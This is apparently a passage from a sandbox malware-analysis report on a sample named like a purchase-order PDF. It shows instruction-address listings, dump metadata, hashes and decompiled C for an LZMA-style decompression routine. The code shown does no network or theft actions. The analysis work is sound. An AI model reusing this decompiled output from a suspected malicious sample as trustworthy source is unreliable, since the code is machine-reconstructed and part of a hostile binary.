                                            														continue;
                                            													} else {
                                            														L80:
                                            														 *(__ebp - 0x88) = 2;
                                            														goto L1;
                                            													}
                                            												}
                                            												 *(__ebp - 0x88) = 0x1c;
                                            												goto L170;
                                            										}
                                            									}
                                            									L171:
                                            									_t544 = _t543 | 0xffffffff;
                                            									goto L172;
                                            								}
                                            							}
                                            						}
                                            					}
                                            					goto L1;
                                            				}
                                            			}














                                            0x00000000
                                            0x00406ffe
                                            0x00406ffe
                                            0x00407002
                                            0x00407023
                                            0x0040702a
                                            0x00407030
                                            0x00407036
                                            0x00407048
                                            0x0040704e
                                            0x00407053
                                            0x00000000
                                            0x00407004
                                            0x0040700a
                                            0x004073cb
                                            0x004073cb
                                            0x004073cb
                                            0x004073ce
                                            0x004073ce
                                            0x004073ce
                                            0x004073d4
                                            0x004073da
                                            0x004073e0
                                            0x004073fa
                                            0x004073fd
                                            0x00407403
                                            0x0040740e
                                            0x00407410
                                            0x004073e2
                                            0x004073e2
                                            0x004073f1
                                            0x004073f5
                                            0x004073f5
                                            0x0040741a
                                            0x00000000
                                            0x00000000
                                            0x0040741c
                                            0x00407420
                                            0x004075cf
                                            0x004075e5
                                            0x004075ed
                                            0x004075f4
                                            0x004075f6
                                            0x004075fd
                                            0x00407601
                                            0x00407601
                                            0x0040742c
                                            0x00407433
                                            0x0040743b
                                            0x0040743e
                                            0x00407441
                                            0x00407441
                                            0x00407447
                                            0x00407447
                                            0x00406be3
                                            0x00406be3
                                            0x00406be3
                                            0x00406bec
                                            0x00000000
                                            0x00000000
                                            0x00406bf2
                                            0x00000000
                                            0x00406bfd
                                            0x00000000
                                            0x00000000
                                            0x00406c06
                                            0x00406c09
                                            0x00406c0c
                                            0x00406c10
                                            0x00000000
                                            0x00000000
                                            0x00406c16
                                            0x00406c19
                                            0x00406c1b
                                            0x00406c1c
                                            0x00406c1f
                                            0x00406c21
                                            0x00406c22
                                            0x00406c24
                                            0x00406c27
                                            0x00406c2c
                                            0x00406c31
                                            0x00406c3a
                                            0x00406c4d
                                            0x00406c50
                                            0x00406c5c
                                            0x00406c84
                                            0x00406c86
                                            0x00406c94
                                            0x00406c94
                                            0x00406c98
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406c88
                                            0x00406c88
                                            0x00406c8b
                                            0x00406c8c
                                            0x00406c8c
                                            0x00000000
                                            0x00406c88
                                            0x00406c62
                                            0x00406c67
                                            0x00406c67
                                            0x00406c70
                                            0x00406c78
                                            0x00406c7b
                                            0x00000000
                                            0x00406c81
                                            0x00406c81
                                            0x00000000
                                            0x00406c81
                                            0x00000000
                                            0x00406c9e
                                            0x00406c9e
                                            0x00406ca2
                                            0x0040754e
                                            0x00000000
                                            0x0040754e
                                            0x00406cab
                                            0x00406cbb
                                            0x00406cbe
                                            0x00406cc1
                                            0x00406cc1
                                            0x00406cc1
                                            0x00406cc4
                                            0x00406cc8
                                            0x00000000
                                            0x00000000
                                            0x00406cca
                                            0x00406cd0
                                            0x00406cfa
                                            0x00406d00
                                            0x00406d07
                                            0x00000000
                                            0x00406d07
                                            0x00406cd6
                                            0x00406cd9
                                            0x00406cde
                                            0x00406cde
                                            0x00406ce9
                                            0x00406cf1
                                            0x00406cf4
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406d39
                                            0x00406d3f
                                            0x00406d42
                                            0x00406d4f
                                            0x00406d57
                                            0x00000000
                                            0x00000000
                                            0x00406d0e
                                            0x00406d0e
                                            0x00406d12
                                            0x0040755d
                                            0x00000000
                                            0x0040755d
                                            0x00406d1e
                                            0x00406d29
                                            0x00406d29
                                            0x00406d29
                                            0x00406d2c
                                            0x00406d2f
                                            0x00406d32
                                            0x00406d37
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004073ce
                                            0x004073ce
                                            0x004073d4
                                            0x004073da
                                            0x004073e0
                                            0x004073fa
                                            0x004073fd
                                            0x00407403
                                            0x0040740e
                                            0x00407410
                                            0x004073e2
                                            0x004073e2
                                            0x004073f1
                                            0x004073f5
                                            0x004073f5
                                            0x0040741a
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406d5f
                                            0x00406d61
                                            0x00406d64
                                            0x00406dd5
                                            0x00406dd8
                                            0x00406ddb
                                            0x00406de2
                                            0x00406dec
                                            0x004073cb
                                            0x004073cb
                                            0x00000000
                                            0x004073cb
                                            0x00406d66
                                            0x00406d6a
                                            0x00406d6d
                                            0x00406d6f
                                            0x00406d72
                                            0x00406d75
                                            0x00406d77
                                            0x00406d7a
                                            0x00406d7c
                                            0x00406d81
                                            0x00406d84
                                            0x00406d87
                                            0x00406d8b
                                            0x00406d92
                                            0x00406d95
                                            0x00406d9c
                                            0x00406da0
                                            0x00406da8
                                            0x00406da8
                                            0x00406da8
                                            0x00406da2
                                            0x00406da2
                                            0x00406da2
                                            0x00406d97
                                            0x00406d97
                                            0x00406d97
                                            0x00406dac
                                            0x00406daf
                                            0x00406dcd
                                            0x00406dcf
                                            0x00000000
                                            0x00406db1
                                            0x00406db1
                                            0x00406db4
                                            0x00406db7
                                            0x00406dba
                                            0x00406dbc
                                            0x00406dbc
                                            0x00406dbc
                                            0x00406dbf
                                            0x00406dc2
                                            0x00406dc4
                                            0x00406dc5
                                            0x00406dc8
                                            0x00000000
                                            0x00406dc8
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00407068
                                            0x0040706c
                                            0x0040708f
                                            0x00407092
                                            0x00407095
                                            0x0040709f
                                            0x0040706e
                                            0x0040706e
                                            0x00407071
                                            0x00407074
                                            0x00407077
                                            0x00407084
                                            0x00407087
                                            0x00407087
                                            0x004073cb
                                            0x004073cb
                                            0x004073cb
                                            0x00000000
                                            0x004073cb
                                            0x00000000
                                            0x004070ab
                                            0x004070af
                                            0x00000000
                                            0x00000000
                                            0x004070b5
                                            0x004070b9
                                            0x00000000
                                            0x00000000
                                            0x004070bf
                                            0x004070c1
                                            0x004070c5
                                            0x004070c5
                                            0x004070c8
                                            0x004070cc
                                            0x00000000
                                            0x00000000
                                            0x0040711c
                                            0x00407120
                                            0x00407127
                                            0x0040712a
                                            0x0040712d
                                            0x00407137
                                            0x004073cb
                                            0x004073cb
                                            0x004073cb
                                            0x00000000
                                            0x004073cb
                                            0x004073cb
                                            0x00407122
                                            0x00000000
                                            0x00000000
                                            0x00407143
                                            0x00407147
                                            0x0040714e
                                            0x00407151
                                            0x00407154
                                            0x00407149
                                            0x00407149
                                            0x00407149
                                            0x00407157
                                            0x0040715a
                                            0x0040715d
                                            0x0040715d
                                            0x00407160
                                            0x00407163
                                            0x00407166
                                            0x00407166
                                            0x00407169
                                            0x00407170
                                            0x00407175
                                            0x00000000
                                            0x00000000
                                            0x00407203
                                            0x00407203
                                            0x00407207
                                            0x004075a5
                                            0x00000000
                                            0x004075a5
                                            0x0040720d
                                            0x00407210
                                            0x00407213
                                            0x00407217
                                            0x0040721a
                                            0x00407220
                                            0x00407222
                                            0x00407222
                                            0x00407222
                                            0x00407225
                                            0x00407228
                                            0x00000000
                                            0x00000000
                                            0x00406df8
                                            0x00406df8
                                            0x00406dfc
                                            0x00407569
                                            0x00000000
                                            0x00407569
                                            0x00406e02
                                            0x00406e05
                                            0x00406e08
                                            0x00406e0c
                                            0x00406e0f
                                            0x00406e15
                                            0x00406e17
                                            0x00406e17
                                            0x00406e17
                                            0x00406e1a
                                            0x00406e1d
                                            0x00406e1d
                                            0x00406e20
                                            0x00406e23
                                            0x00000000
                                            0x00000000
                                            0x00406e29
                                            0x00406e2f
                                            0x00000000
                                            0x00000000
                                            0x00406e35
                                            0x00406e35
                                            0x00406e39
                                            0x00406e3c
                                            0x00406e3f
                                            0x00406e42
                                            0x00406e45
                                            0x00406e46
                                            0x00406e49
                                            0x00406e4b
                                            0x00406e51
                                            0x00406e54
                                            0x00406e57
                                            0x00406e5a
                                            0x00406e5d
                                            0x00406e60
                                            0x00406e63
                                            0x00406e7f
                                            0x00406e82
                                            0x00406e85
                                            0x00406e88
                                            0x00406e8f
                                            0x00406e93
                                            0x00406e95
                                            0x00406e99
                                            0x00406e65
                                            0x00406e65
                                            0x00406e69
                                            0x00406e71
                                            0x00406e76
                                            0x00406e78
                                            0x00406e7a
                                            0x00406e7a
                                            0x00406e9c
                                            0x00406ea3
                                            0x00406ea6
                                            0x00000000
                                            0x00406eac
                                            0x00000000
                                            0x00406eac
                                            0x00000000
                                            0x00406eb1
                                            0x00406eb1
                                            0x00406eb5
                                            0x00407575
                                            0x00000000
                                            0x00407575
                                            0x00406ebb
                                            0x00406ebe
                                            0x00406ec1
                                            0x00406ec5
                                            0x00406ec8
                                            0x00406ece
                                            0x00406ed0
                                            0x00406ed0
                                            0x00406ed0
                                            0x00406ed3
                                            0x00406ed6
                                            0x00406ed6
                                            0x00406ed6
                                            0x00406edc
                                            0x00000000
                                            0x00000000
                                            0x00406ede
                                            0x00406ee1
                                            0x00406ee4
                                            0x00406ee7
                                            0x00406eea
                                            0x00406eed
                                            0x00406ef0
                                            0x00406ef3
                                            0x00406ef6
                                            0x00406ef9
                                            0x00406efc
                                            0x00406f14
                                            0x00406f17
                                            0x00406f1a
                                            0x00406f1d
                                            0x00406f1d
                                            0x00406f20
                                            0x00406f24
                                            0x00406f26
                                            0x00406efe
                                            0x00406efe
                                            0x00406f06
                                            0x00406f0b
                                            0x00406f0d
                                            0x00406f0f
                                            0x00406f0f
                                            0x00406f29
                                            0x00406f30
                                            0x00406f33
                                            0x00000000
                                            0x00406f35
                                            0x00000000
                                            0x00406f35
                                            0x00406f33
                                            0x00406f3a
                                            0x00406f3a
                                            0x00406f3a
                                            0x00406f3a
                                            0x00000000
                                            0x00000000
                                            0x00406f75
                                            0x00406f75
                                            0x00406f79
                                            0x00407581
                                            0x00000000
                                            0x00407581
                                            0x00406f7f
                                            0x00406f82
                                            0x00406f85
                                            0x00406f89
                                            0x00406f8c
                                            0x00406f92
                                            0x00406f94
                                            0x00406f94
                                            0x00406f94
                                            0x00406f97
                                            0x00406f9a
                                            0x00406f9a
                                            0x00406fa0
                                            0x00406f3e
                                            0x00406f3e
                                            0x00406f41
                                            0x00000000
                                            0x00406f41
                                            0x00406fa2
                                            0x00406fa2
                                            0x00406fa5
                                            0x00406fa8
                                            0x00406fab
                                            0x00406fae
                                            0x00406fb1
                                            0x00406fb4
                                            0x00406fb7
                                            0x00406fba
                                            0x00406fbd
                                            0x00406fc0
                                            0x00406fd8
                                            0x00406fdb
                                            0x00406fde
                                            0x00406fe1
                                            0x00406fe1
                                            0x00406fe4
                                            0x00406fe8
                                            0x00406fea
                                            0x00406fc2
                                            0x00406fc2
                                            0x00406fca
                                            0x00406fcf
                                            0x00406fd1
                                            0x00406fd3
                                            0x00406fd3
                                            0x00406fed
                                            0x00406ff4
                                            0x00406ff7
                                            0x00000000
                                            0x00406ff9
                                            0x00000000
                                            0x00406ff9
                                            0x00000000
                                            0x00407286
                                            0x00407286
                                            0x0040728a
                                            0x004075b1
                                            0x00000000
                                            0x004075b1
                                            0x00407290
                                            0x00407293
                                            0x00407296
                                            0x0040729a
                                            0x0040729d
                                            0x004072a3
                                            0x004072a5
                                            0x004072a5
                                            0x004072a5
                                            0x004072a8
                                            0x00000000
                                            0x00000000
                                            0x00407056
                                            0x00407056
                                            0x00407059
                                            0x004073cb
                                            0x004073cb
                                            0x004073cb
                                            0x00000000
                                            0x004073cb
                                            0x00000000
                                            0x00407395
                                            0x00407399
                                            0x004073bb
                                            0x004073be
                                            0x004073c8
                                            0x004073cb
                                            0x004073cb
                                            0x004073cb
                                            0x00000000
                                            0x004073cb
                                            0x004073cb
                                            0x0040739b
                                            0x0040739e
                                            0x004073a2
                                            0x004073a5
                                            0x004073a5
                                            0x004073a8
                                            0x00000000
                                            0x00000000
                                            0x00407452
                                            0x00407456
                                            0x00407474
                                            0x00407474
                                            0x00407474
                                            0x0040747b
                                            0x00407482
                                            0x00407489
                                            0x00407489
                                            0x00000000
                                            0x00407489
                                            0x00407458
                                            0x0040745b
                                            0x0040745e
                                            0x00407461
                                            0x00407468
                                            0x004073ac
                                            0x004073ac
                                            0x004073af
                                            0x00000000
                                            0x00000000
                                            0x00407543
                                            0x00407546
                                            0x00407447
                                            0x00000000
                                            0x00000000
                                            0x0040717d
                                            0x0040717f
                                            0x00407186
                                            0x00407187
                                            0x00407189
                                            0x0040718c
                                            0x00000000
                                            0x00000000
                                            0x00407194
                                            0x00407197
                                            0x0040719a
                                            0x0040719c
                                            0x0040719e
                                            0x0040719e
                                            0x0040719f
                                            0x004071a2
                                            0x004071a9
                                            0x004071ac
                                            0x004071ba
                                            0x00000000
                                            0x00000000
                                            0x00407490
                                            0x00407490
                                            0x00407493
                                            0x0040749a
                                            0x00000000
                                            0x00000000
                                            0x0040749f
                                            0x0040749f
                                            0x004074a3
                                            0x004075db
                                            0x00000000
                                            0x004075db
                                            0x004074a9
                                            0x004074ac
                                            0x004074af
                                            0x004074b3
                                            0x004074b6
                                            0x004074bc
                                            0x004074be
                                            0x004074be
                                            0x004074be
                                            0x004074c1
                                            0x004074c4
                                            0x004074c4
                                            0x004074c4
                                            0x004074c4
                                            0x004074c7
                                            0x004074c7
                                            0x004074cb
                                            0x0040752b
                                            0x0040752e
                                            0x00407533
                                            0x00407534
                                            0x00407536
                                            0x00407538
                                            0x0040753b
                                            0x00407447
                                            0x00407447
                                            0x00000000
                                            0x0040744d
                                            0x00407447
                                            0x004074cd
                                            0x004074d3
                                            0x004074d6
                                            0x004074d9
                                            0x004074dc
                                            0x004074df
                                            0x004074e2
                                            0x004074e5
                                            0x004074e8
                                            0x004074eb
                                            0x004074ee
                                            0x00407507
                                            0x0040750a
                                            0x0040750d
                                            0x00407510
                                            0x00407514
                                            0x00407516
                                            0x00407516
                                            0x00407517
                                            0x0040751a
                                            0x004074f0
                                            0x004074f0
                                            0x004074f8
                                            0x004074fd
                                            0x004074ff
                                            0x00407502
                                            0x00407502
                                            0x0040751d
                                            0x00407524
                                            0x00000000
                                            0x00407526
                                            0x00000000
                                            0x00407526
                                            0x00000000
                                            0x004071c2
                                            0x004071c5
                                            0x004071fb
                                            0x0040732b
                                            0x0040732b
                                            0x0040732b
                                            0x0040732b
                                            0x0040732e
                                            0x0040732e
                                            0x00407331
                                            0x00407333
                                            0x004075bd
                                            0x00000000
                                            0x004075bd
                                            0x00407339
                                            0x0040733c
                                            0x00000000
                                            0x00000000
                                            0x00407342
                                            0x00407346
                                            0x00407349
                                            0x00407349
                                            0x00407349
                                            0x00000000
                                            0x00407349
                                            0x004071c7
                                            0x004071c9
                                            0x004071cb
                                            0x004071cd
                                            0x004071d0
                                            0x004071d1
                                            0x004071d3
                                            0x004071d5
                                            0x004071d8
                                            0x004071db
                                            0x004071f1
                                            0x004071f6
                                            0x0040722e
                                            0x0040722e
                                            0x00407232
                                            0x0040725e
                                            0x00407260
                                            0x00407267
                                            0x0040726a
                                            0x0040726d
                                            0x0040726d
                                            0x00407272
                                            0x00407272
                                            0x00407274
                                            0x00407277
                                            0x0040727e
                                            0x00407281
                                            0x004072ae
                                            0x004072ae
                                            0x004072b1
                                            0x004072b4
                                            0x00407328
                                            0x00407328
                                            0x00407328
                                            0x00000000
                                            0x00407328
                                            0x004072b6
                                            0x004072bc
                                            0x004072bf
                                            0x004072c2
                                            0x004072c5
                                            0x004072c8
                                            0x004072cb
                                            0x004072ce
                                            0x004072d1
                                            0x004072d4
                                            0x004072d7
                                            0x004072f0
                                            0x004072f2
                                            0x004072f5
                                            0x004072f6
                                            0x004072f9
                                            0x004072fb
                                            0x004072fe
                                            0x00407300
                                            0x00407302
                                            0x00407305
                                            0x00407307
                                            0x0040730a
                                            0x0040730e
                                            0x00407310
                                            0x00407310
                                            0x00407311
                                            0x00407314
                                            0x00407317
                                            0x004072d9
                                            0x004072d9
                                            0x004072e1
                                            0x004072e6
                                            0x004072e8
                                            0x004072eb
                                            0x004072eb
                                            0x0040731a
                                            0x00407321
                                            0x004072ab
                                            0x004072ab
                                            0x004072ab
                                            0x004072ab
                                            0x00000000
                                            0x00407323
                                            0x00000000
                                            0x00407323
                                            0x00407321
                                            0x00407234
                                            0x00407237
                                            0x00407239
                                            0x0040723c
                                            0x0040723f
                                            0x00407242
                                            0x00407244
                                            0x00407247
                                            0x0040724a
                                            0x0040724a
                                            0x0040724d
                                            0x0040724d
                                            0x00407250
                                            0x00407257
                                            0x0040722b
                                            0x0040722b
                                            0x0040722b
                                            0x0040722b
                                            0x00000000
                                            0x00407259
                                            0x00000000
                                            0x00407259
                                            0x00407257
                                            0x004071dd
                                            0x004071e0
                                            0x004071e2
                                            0x004071e5
                                            0x00000000
                                            0x00000000
                                            0x00406f44
                                            0x00406f44
                                            0x00406f48
                                            0x0040758d
                                            0x00000000
                                            0x0040758d
                                            0x00406f4e
                                            0x00406f51
                                            0x00406f54
                                            0x00406f57
                                            0x00406f5a
                                            0x00406f5d
                                            0x00406f60
                                            0x00406f62
                                            0x00406f65
                                            0x00406f68
                                            0x00406f6b
                                            0x00406f6d
                                            0x00406f6d
                                            0x00406f6d
                                            0x00000000
                                            0x00000000
                                            0x004070cf
                                            0x004070cf
                                            0x004070d3
                                            0x00407599
                                            0x00000000
                                            0x00407599
                                            0x004070d9
                                            0x004070dc
                                            0x004070df
                                            0x004070e2
                                            0x004070e4
                                            0x004070e4
                                            0x004070e4
                                            0x004070e7
                                            0x004070ea
                                            0x004070ed
                                            0x004070f0
                                            0x004070f3
                                            0x004070f6
                                            0x004070f7
                                            0x004070f9
                                            0x004070f9
                                            0x004070f9
                                            0x004070fc
                                            0x004070ff
                                            0x00407102
                                            0x00407105
                                            0x00407105
                                            0x00407105
                                            0x00407108
                                            0x0040710a
                                            0x0040710a
                                            0x00000000
                                            0x00000000
                                            0x0040734c
                                            0x0040734c
                                            0x0040734c
                                            0x00407350
                                            0x00000000
                                            0x00000000
                                            0x00407356
                                            0x00407359
                                            0x0040735c
                                            0x0040735f
                                            0x00407361
                                            0x00407361
                                            0x00407361
                                            0x00407364
                                            0x00407367
                                            0x0040736a
                                            0x0040736d
                                            0x00407370
                                            0x00407373
                                            0x00407374
                                            0x00407376
                                            0x00407376
                                            0x00407376
                                            0x00407379
                                            0x0040737c
                                            0x0040737f
                                            0x00407382
                                            0x00407385
                                            0x00407389
                                            0x0040738b
                                            0x0040738e
                                            0x00000000
                                            0x00407390
                                            0x0040710d
                                            0x0040710d
                                            0x00000000
                                            0x0040710d
                                            0x0040738e
                                            0x004075c3
                                            0x00000000
                                            0x00000000
                                            0x00406bf2
                                            0x004075fa
                                            0x004075fa
                                            0x00000000
                                            0x004075fa
                                            0x00407447
                                            0x004073ce
                                            0x004073cb
                                            0x00000000
                                            0x00407002

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                                            • Instruction ID: 4a3513360c1d1cc4287bdabe5afcaa460628bed3c0d7ae87261646ca99be8a9f
                                            • Opcode Fuzzy Hash: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                                            • Instruction Fuzzy Hash: 0D711271D04228DBEF28CF98C9947ADBBF1FB44305F14806AD856B7280D738A986DF05
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 98%
                                            			E0040711C() {
                                            				unsigned short _t531;
                                            				signed int _t532;
                                            				void _t533;
                                            				signed int _t534;
                                            				signed int _t535;
                                            				signed int _t565;
                                            				signed int _t568;
                                            				signed int _t589;
                                            				signed int* _t606;
                                            				void* _t613;
                                            
                                            				L0:
                                            				while(1) {
                                            					L0:
                                            					if( *(_t613 - 0x40) != 0) {
                                            						 *(_t613 - 0x84) = 0xb;
                                            						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
                                            						goto L132;
                                            					} else {
                                            						__eax =  *(__ebp - 0x28);
                                            						L88:
                                            						 *(__ebp - 0x2c) = __eax;
                                            						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                            						L89:
                                            						__eax =  *(__ebp - 4);
                                            						 *(__ebp - 0x80) = 0x15;
                                            						__eax =  *(__ebp - 4) + 0xa68;
                                            						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                            						L69:
                                            						 *(__ebp - 0x84) = 0x12;
                                            						while(1) {
                                            							L132:
                                            							 *(_t613 - 0x54) = _t606;
                                            							while(1) {
                                            								L133:
                                            								_t531 =  *_t606;
                                            								_t589 = _t531 & 0x0000ffff;
                                            								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                            								if( *(_t613 - 0xc) >= _t565) {
                                            									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                            									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                            									 *(_t613 - 0x40) = 1;
                                            									_t532 = _t531 - (_t531 >> 5);
                                            									 *_t606 = _t532;
                                            								} else {
                                            									 *(_t613 - 0x10) = _t565;
                                            									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                            									 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                            								}
                                            								if( *(_t613 - 0x10) >= 0x1000000) {
                                            									goto L139;
                                            								}
                                            								L137:
                                            								if( *(_t613 - 0x6c) == 0) {
                                            									 *(_t613 - 0x88) = 5;
                                            									L170:
                                            									_t568 = 0x22;
                                            									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                            									_t535 = 0;
                                            									L172:
                                            									return _t535;
                                            								}
                                            								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                            								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                            								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                            								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                            								L139:
                                            								_t533 =  *(_t613 - 0x84);
                                            								while(1) {
                                            									 *(_t613 - 0x88) = _t533;
                                            									while(1) {
                                            										L1:
                                            										_t534 =  *(_t613 - 0x88);
                                            										if(_t534 > 0x1c) {
                                            											break;
                                            										}
                                            										switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
                                            											case 0:
                                            												if( *(_t613 - 0x6c) == 0) {
                                            													goto L170;
                                            												}
                                            												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                            												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                            												_t534 =  *( *(_t613 - 0x70));
                                            												if(_t534 > 0xe1) {
                                            													goto L171;
                                            												}
                                            												_t538 = _t534 & 0x000000ff;
                                            												_push(0x2d);
                                            												asm("cdq");
                                            												_pop(_t570);
                                            												_push(9);
                                            												_pop(_t571);
                                            												_t609 = _t538 / _t570;
                                            												_t540 = _t538 % _t570 & 0x000000ff;
                                            												asm("cdq");
                                            												_t604 = _t540 % _t571 & 0x000000ff;
                                            												 *(_t613 - 0x3c) = _t604;
                                            												 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                            												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                                            												_t612 = (0x300 << _t604 + _t609) + 0x736;
                                            												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                            													L10:
                                            													if(_t612 == 0) {
                                            														L12:
                                            														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                            														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                            														goto L15;
                                            													} else {
                                            														goto L11;
                                            													}
                                            													do {
                                            														L11:
                                            														_t612 = _t612 - 1;
                                            														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                            													} while (_t612 != 0);
                                            													goto L12;
                                            												}
                                            												if( *(_t613 - 4) != 0) {
                                            													GlobalFree( *(_t613 - 4));
                                            												}
                                            												_t534 = GlobalAlloc(0x40, 0x600); // executed
                                            												 *(_t613 - 4) = _t534;
                                            												if(_t534 == 0) {
                                            													goto L171;
                                            												} else {
                                            													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                            													goto L10;
                                            												}
                                            											case 1:
                                            												L13:
                                            												__eflags =  *(_t613 - 0x6c);
                                            												if( *(_t613 - 0x6c) == 0) {
                                            													 *(_t613 - 0x88) = 1;
                                            													goto L170;
                                            												}
                                            												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                            												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                            												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                            												_t45 = _t613 - 0x48;
                                            												 *_t45 =  *(_t613 - 0x48) + 1;
                                            												__eflags =  *_t45;
                                            												L15:
                                            												if( *(_t613 - 0x48) < 4) {
                                            													goto L13;
                                            												}
                                            												_t546 =  *(_t613 - 0x40);
                                            												if(_t546 ==  *(_t613 - 0x74)) {
                                            													L20:
                                            													 *(_t613 - 0x48) = 5;
                                            													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                            													goto L23;
                                            												}
                                            												 *(_t613 - 0x74) = _t546;
                                            												if( *(_t613 - 8) != 0) {
                                            													GlobalFree( *(_t613 - 8));
                                            												}
                                            												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                            												 *(_t613 - 8) = _t534;
                                            												if(_t534 == 0) {
                                            													goto L171;
                                            												} else {
                                            													goto L20;
                                            												}
                                            											case 2:
                                            												L24:
                                            												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                            												 *(_t613 - 0x84) = 6;
                                            												 *(_t613 - 0x4c) = _t553;
                                            												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                                            												L132:
                                            												 *(_t613 - 0x54) = _t606;
                                            												goto L133;
                                            											case 3:
                                            												L21:
                                            												__eflags =  *(_t613 - 0x6c);
                                            												if( *(_t613 - 0x6c) == 0) {
                                            													 *(_t613 - 0x88) = 3;
                                            													goto L170;
                                            												}
                                            												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                            												_t67 = _t613 - 0x70;
                                            												 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                            												__eflags =  *_t67;
                                            												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                            												L23:
                                            												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                            												if( *(_t613 - 0x48) != 0) {
                                            													goto L21;
                                            												}
                                            												goto L24;
                                            											case 4:
                                            												L133:
                                            												_t531 =  *_t606;
                                            												_t589 = _t531 & 0x0000ffff;
                                            												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                            												if( *(_t613 - 0xc) >= _t565) {
                                            													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                            													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                            													 *(_t613 - 0x40) = 1;
                                            													_t532 = _t531 - (_t531 >> 5);
                                            													 *_t606 = _t532;
                                            												} else {
                                            													 *(_t613 - 0x10) = _t565;
                                            													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                            													 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                            												}
                                            												if( *(_t613 - 0x10) >= 0x1000000) {
                                            													goto L139;
                                            												}
                                            											case 5:
                                            												goto L137;
                                            											case 6:
                                            												__edx = 0;
                                            												__eflags =  *(__ebp - 0x40);
                                            												if( *(__ebp - 0x40) != 0) {
                                            													__eax =  *(__ebp - 4);
                                            													__ecx =  *(__ebp - 0x38);
                                            													 *(__ebp - 0x34) = 1;
                                            													 *(__ebp - 0x84) = 7;
                                            													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                            													while(1) {
                                            														L132:
                                            														 *(_t613 - 0x54) = _t606;
                                            														goto L133;
                                            													}
                                            												}
                                            												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                            												__esi =  *(__ebp - 0x60);
                                            												__cl = 8;
                                            												__cl = 8 -  *(__ebp - 0x3c);
                                            												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                            												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                            												__ecx =  *(__ebp - 0x3c);
                                            												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                            												__ecx =  *(__ebp - 4);
